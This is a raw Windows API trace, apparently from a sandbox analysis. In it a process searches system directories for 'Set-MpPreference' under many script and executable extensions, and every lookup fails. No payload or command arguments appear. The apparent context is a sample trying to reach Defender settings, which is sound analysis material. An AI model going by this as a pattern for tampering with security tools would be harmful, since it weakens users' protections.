	[0089.906] GetLastError () returned 0x2
	[0089.906] SetErrorMode (uMode=0x1) returned 0x1
	[0089.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.907] GetLastError () returned 0x2
	[0089.907] SetErrorMode (uMode=0x1) returned 0x1
	[0089.907] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.JS", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.907] GetLastError () returned 0x2
	[0089.907] SetErrorMode (uMode=0x1) returned 0x1
	[0089.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.907] GetLastError () returned 0x2
	[0089.907] SetErrorMode (uMode=0x1) returned 0x1
	[0089.907] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.JSE", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.907] GetLastError () returned 0x2
	[0089.907] SetErrorMode (uMode=0x1) returned 0x1
	[0089.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.907] GetLastError () returned 0x2
	[0089.907] SetErrorMode (uMode=0x1) returned 0x1
	[0089.907] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.WSF", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.908] GetLastError () returned 0x2
	[0089.908] SetErrorMode (uMode=0x1) returned 0x1
	[0089.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.908] GetLastError () returned 0x2
	[0089.908] SetErrorMode (uMode=0x1) returned 0x1
	[0089.908] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.WSH", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.908] GetLastError () returned 0x2
	[0089.908] SetErrorMode (uMode=0x1) returned 0x1
	[0089.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.908] GetLastError () returned 0x2
	[0089.908] SetErrorMode (uMode=0x1) returned 0x1
	[0089.908] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.MSC", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.908] GetLastError () returned 0x2
	[0089.908] SetErrorMode (uMode=0x1) returned 0x1
	[0089.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0089.908] GetLastError () returned 0x2
	[0089.908] SetErrorMode (uMode=0x1) returned 0x1
	[0089.909] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.909] GetLastError () returned 0x2
	[0089.909] SetErrorMode (uMode=0x1) returned 0x1
	[0089.909] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.909] GetLastError () returned 0x2
	[0089.909] SetErrorMode (uMode=0x1) returned 0x1
	[0089.909] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.ps1", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.909] GetLastError () returned 0x2
	[0089.909] SetErrorMode (uMode=0x1) returned 0x1
	[0089.909] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.909] GetLastError () returned 0x2
	[0089.909] SetErrorMode (uMode=0x1) returned 0x1
	[0089.909] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.psm1", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.910] GetLastError () returned 0x2
	[0089.910] SetErrorMode (uMode=0x1) returned 0x1
	[0089.910] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.910] GetLastError () returned 0x2
	[0089.910] SetErrorMode (uMode=0x1) returned 0x1
	[0089.910] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.psd1", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.910] GetLastError () returned 0x2
	[0089.910] SetErrorMode (uMode=0x1) returned 0x1
	[0089.910] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.910] GetLastError () returned 0x2
	[0089.910] SetErrorMode (uMode=0x1) returned 0x1
	[0089.910] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.COM", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.910] GetLastError () returned 0x2
	[0089.910] SetErrorMode (uMode=0x1) returned 0x1
	[0089.910] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.910] GetLastError () returned 0x2
	[0089.910] SetErrorMode (uMode=0x1) returned 0x1
	[0089.911] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.EXE", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.911] GetLastError () returned 0x2
	[0089.911] SetErrorMode (uMode=0x1) returned 0x1
	[0089.911] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.911] GetLastError () returned 0x2
	[0089.911] SetErrorMode (uMode=0x1) returned 0x1
	[0089.911] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.BAT", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.911] GetLastError () returned 0x2
	[0089.911] SetErrorMode (uMode=0x1) returned 0x1
	[0089.911] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.911] GetLastError () returned 0x2
	[0089.911] SetErrorMode (uMode=0x1) returned 0x1
	[0089.911] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.CMD", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.911] GetLastError () returned 0x2
	[0089.912] SetErrorMode (uMode=0x1) returned 0x1
	[0089.912] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.912] GetLastError () returned 0x2
	[0089.912] SetErrorMode (uMode=0x1) returned 0x1
	[0089.912] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.VBS", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.912] GetLastError () returned 0x2
	[0089.912] SetErrorMode (uMode=0x1) returned 0x1
	[0089.912] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.912] GetLastError () returned 0x2
	[0089.912] SetErrorMode (uMode=0x1) returned 0x1
	[0089.912] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.VBE", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.912] GetLastError () returned 0x2
	[0089.912] SetErrorMode (uMode=0x1) returned 0x1
	[0089.912] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.912] GetLastError () returned 0x2
	[0089.912] SetErrorMode (uMode=0x1) returned 0x1
	[0089.912] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.JS", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.913] GetLastError () returned 0x2
	[0089.913] SetErrorMode (uMode=0x1) returned 0x1
	[0089.913] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.913] GetLastError () returned 0x2
	[0089.913] SetErrorMode (uMode=0x1) returned 0x1
	[0089.913] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.JSE", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.913] GetLastError () returned 0x2
	[0089.913] SetErrorMode (uMode=0x1) returned 0x1
	[0089.913] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.913] GetLastError () returned 0x2
	[0089.913] SetErrorMode (uMode=0x1) returned 0x1
	[0089.913] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.WSF", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.913] GetLastError () returned 0x2
	[0089.913] SetErrorMode (uMode=0x1) returned 0x1
	[0089.913] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.914] GetLastError () returned 0x2
	[0089.914] SetErrorMode (uMode=0x1) returned 0x1
	[0089.914] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.WSH", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.914] GetLastError () returned 0x2
	[0089.914] SetErrorMode (uMode=0x1) returned 0x1
	[0089.914] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.914] GetLastError () returned 0x2
	[0089.914] SetErrorMode (uMode=0x1) returned 0x1
	[0089.914] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.MSC", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.914] GetLastError () returned 0x2
	[0089.914] SetErrorMode (uMode=0x1) returned 0x1
	[0089.914] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0089.914] GetLastError () returned 0x2
	[0089.914] SetErrorMode (uMode=0x1) returned 0x1
	[0089.914] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.915] GetLastError () returned 0x2
	[0089.915] SetErrorMode (uMode=0x1) returned 0x1
	[0089.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0089.915] GetLastError () returned 0x2
	[0089.915] SetErrorMode (uMode=0x1) returned 0x1
	[0089.915] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.ps1", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.915] GetLastError () returned 0x2
	[0089.915] SetErrorMode (uMode=0x1) returned 0x1
	[0089.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0089.915] GetLastError () returned 0x2
	[0089.915] SetErrorMode (uMode=0x1) returned 0x1
	[0089.915] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.psm1", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.915] GetLastError () returned 0x2
	[0089.915] SetErrorMode (uMode=0x1) returned 0x1
	[0089.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0089.915] GetLastError () returned 0x2
	[0089.916] SetErrorMode (uMode=0x1) returned 0x1
	[0089.916] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.psd1", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.916] GetLastError () returned 0x2
	[0089.916] SetErrorMode (uMode=0x1) returned 0x1
	[0089.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0089.916] GetLastError () returned 0x2
	[0089.916] SetErrorMode (uMode=0x1) returned 0x1
	[0089.916] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.COM", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.916] GetLastError () returned 0x2
	[0089.916] SetErrorMode (uMode=0x1) returned 0x1
	[0089.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0089.916] GetLastError () returned 0x2
	[0089.916] SetErrorMode (uMode=0x1) returned 0x1
	[0089.916] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.EXE", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.917] GetLastError () returned 0x2
	[0089.917] SetErrorMode (uMode=0x1) returned 0x1
	[0089.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0089.917] GetLastError () returned 0x2
	[0089.917] SetErrorMode (uMode=0x1) returned 0x1
	[0089.917] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.BAT", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.917] GetLastError () returned 0x2
	[0089.917] SetErrorMode (uMode=0x1) returned 0x1
	[0089.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0089.917] GetLastError () returned 0x2
	[0089.917] SetErrorMode (uMode=0x1) returned 0x1
	[0089.917] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.CMD", lpFindFileData=0x3b18e0 | out: lpFindFileData=0x3b18e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0089.917] GetLastError () returned 0x2
	[0089.917] SetErrorMode (uMode=0x1) returned 0x1
	[0089.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x43ae800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0089.917] GetLastError () returned 0x2
	[0089.917] SetErrorMode (uMode=0x1) returned 0x1
